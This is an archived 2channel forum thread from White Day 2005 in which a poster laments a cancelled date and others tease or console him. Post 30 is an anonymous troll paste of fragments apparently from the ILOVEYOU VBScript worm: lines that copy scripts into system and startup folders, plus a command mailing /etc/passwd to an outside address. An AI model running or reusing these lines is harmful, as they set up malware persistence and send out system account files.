2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

飯も食わず掃除も済ませて贈り物も用意したのに

1 :正夢 ◆kSIA/djmRQ :05/03/14 18:25:30 ID:3+ZG3J8c0
ドタキャンorz

2 :学生さんは名前がない:05/03/14 18:25:59 ID:cMJAAWnVO
2

3 :坂田:05/03/14 18:26:55 ID:/WklkfS80
どんな彼女だ?
かわいい?
同じ学校?

4 :幹事長 ◆Bp3P89bt1g :05/03/14 18:26:59 ID:qmeKztG90
十年ぶりだかで田舎に帰ったんだけど、俺はちょっと暇持て余して買い物してたんだよ。
そしたら臨時休業か何かでさー、店閉まってて呆然としてたら、
隣の女も同じく空振り食ってたらしくて「あはは、これじゃしょうがないっすねー」っつって笑いあってた。

その人、ショートカットで飾らない感じで、可愛い系ってより美人系って感じの、
もろに俺の好みでな、かなり気になってたんだが、そしたら向こうから
「あの、良かったら・・・これから一緒に買い物でも行きませんか?」
って言ってきたんだよ。二つ返事でOKしたよ。

その人とは、話も合うし、何より一緒にいてすごく楽しいんだ。なんか今日はじめて会ったって気がしない。
俺は今まで告白なんてしたことないチキン野郎だったんだけど、
勇気を振り絞って「また会えませんか?」って言ったんだがそこで目が覚めました。

おはようお前等。


5 :学生さんは名前がない:05/03/14 18:27:20 ID:6IJe+F9T0
あなたに春が訪れますように・・(-人-)

6 :正夢 ◆kSIA/djmRQ :05/03/14 18:27:29 ID:3+ZG3J8c0
>>3
彼女じゃなくて好きな子

7 :青灰 ◆KPzP3//zzY :05/03/14 18:28:49 ID:7T2cun21O
今日はホワイトデーだから?(・∀・)

8 :正夢 ◆kSIA/djmRQ :05/03/14 18:29:23 ID:3+ZG3J8c0
>>7
あああああああああああああああ
ちくしょーーーーどうしようこのお菓子

9 :坂田:05/03/14 18:29:47 ID:/WklkfS80
>>4
幹事長の張る女関係の長文はどっから持ってくるんだろうな
おもしろい


10 :坂田:05/03/14 18:30:39 ID:/WklkfS80
>>4
それ読んだことあるよ
!シネ!

11 :学生さんは名前がない:05/03/14 18:30:52 ID:AbPXWm6p0
シネ

12 :学生さんは名前がない:05/03/14 18:31:01 ID:6IJe+F9T0
>>8
自分で食べたらどうですか?

13 :正夢 ◆kSIA/djmRQ :05/03/14 18:31:31 ID:3+ZG3J8c0
>>12
惨め極まりないじゃん・・・

14 :坂田:05/03/14 18:33:00 ID:/WklkfS80
どういうつながりかいえよ」

15 :学生さんは名前がない:05/03/14 18:33:05 ID:4MZPxDaH0
クソスレ立てんな氏ね

16 :正夢 ◆kSIA/djmRQ :05/03/14 18:33:50 ID:3+ZG3J8c0
>>14
こないだ俺にケーキくれた友達

17 :青灰 ◆KPzP3//zzY :05/03/14 18:34:03 ID:7T2cun21O
日持ちしないお菓子なの?
漏れたべましょーか(´〜`)

18 :学生さんは名前がない:05/03/14 18:34:47 ID:6IJe+F9T0
まぁ、きっと長い人生そんなこともあるよ。
いずれ、あんな事もあったなぁって
笑える日がくるって。
元気出して

19 :学生さんは名前がない:05/03/14 18:36:26 ID:voi8O5pQO
さっさと渋谷行って食べっ子と闘え

20 :正夢 ◆kSIA/djmRQ :05/03/14 18:36:50 ID:3+ZG3J8c0
>>17
日持ちしないのかな?
ハート型のクッキーなのだけど

とりあえず冷暗所においてある

21 :幹事長 ◆Bp3P89bt1g :05/03/14 18:37:32 ID:qmeKztG90
>>18
元気出して〜チャンスは一度〜きりじゃない〜

22 :学生さんは名前がない:05/03/14 18:40:15 ID:YsrhAkAS0
新宿から恵比寿まで歩いてきた。
原宿〜渋谷で明らかに周りのカポー率が高くなる。
・・・どいつもこいつも幸せそうに歩きやがってええええええええ!!!!!!!!!!!
ちんたらある移転じゃねーぞごるぁあああああああああ
ワザと男の肩にぶつかりながら帰ってきた

23 :坂田:05/03/14 18:41:20 ID:/WklkfS80
>>22
ワロス

新宿恵比寿間は歩いて何分か教えてくれ

24 :青灰 ◆KPzP3//zzY :05/03/14 18:41:30 ID:7T2cun21O
>>20
クッキーならわりと平気じゃないかな。
はぁととはかわいーなーぁ
後日渡しとかでいかが?

25 :正夢 ◆kSIA/djmRQ :05/03/14 18:42:32 ID:3+ZG3J8c0
>>24
うい・・・
今日は何しようかなはぁ・・・

26 :学生さんは名前がない:05/03/14 18:43:01 ID:RWy1+FgP0
東京の人間か?こういう時こそストレス発散

27 :正夢 ◆kSIA/djmRQ :05/03/14 18:46:42 ID:3+ZG3J8c0
>>26
地方でございます
てか天下一武道会すれ立てたの俺だし
まさか本当にやるとは思わなかった

男友達と飯でも食ってくる

28 :学生さんは名前がない:05/03/14 18:46:52 ID:YsrhAkAS0
>>23
1時間ぐらいか

まぁ今日はバイトの面接だったんだが、そこで女の子と二人きりになれたお。
(自分で日にちを自由に入れられる面接で)今日来てるということは彼氏いないと思っていいよな。

29 :正夢 ◆kSIA/djmRQ :05/03/14 18:50:12 ID:3+ZG3J8c0
嘘言っても誰も釣れないやorz

30 :学生さんは名前がない:05/03/14 18:50:26 ID:AbPXWm6p0
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

31 :青灰 ◆KPzP3//zzY :05/03/14 18:51:20 ID:7T2cun21O
>>27
そーなの!?
私は親不知ぬいてきて顔腫らしてるから自宅で日常的生活

32 :坂田:05/03/14 18:51:31 ID:/WklkfS80
おれは新宿3丁目あるいてた まじ

33 :正夢 ◆kSIA/djmRQ :05/03/14 18:52:24 ID:3+ZG3J8c0
>>31
嘘ですヾ(´▽`*ゝ
俺も奥歯が痛いんだけど・・・

34 :青灰 ◆KPzP3//zzY :05/03/14 18:56:40 ID:7T2cun21O
なんだー。
親不知は生えてくると歯並び押して変えちゃったりするから困りもんでっせ。
歯科受診推奨

35 :学生さんは名前がない:05/03/14 18:58:04 ID:6IJe+F9T0
このスレ開くと、ノートンさんが反応するよ?

36 :正夢 ◆kSIA/djmRQ :05/03/14 18:58:11 ID:3+ZG3J8c0
>>34
歯医者怖いなあ
彼氏さんとはすごされないとですか、今夜は?

37 :青灰 ◆KPzP3//zzY :05/03/14 19:02:14 ID:7T2cun21O
>>35
あぼーんコテ祭りだからじゃねww
>>36
今週末から艦が修理期間入りする関係で残業ちゅうだし
歯っつか骨いたいから…おとなしくしてます(-_-)

8 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)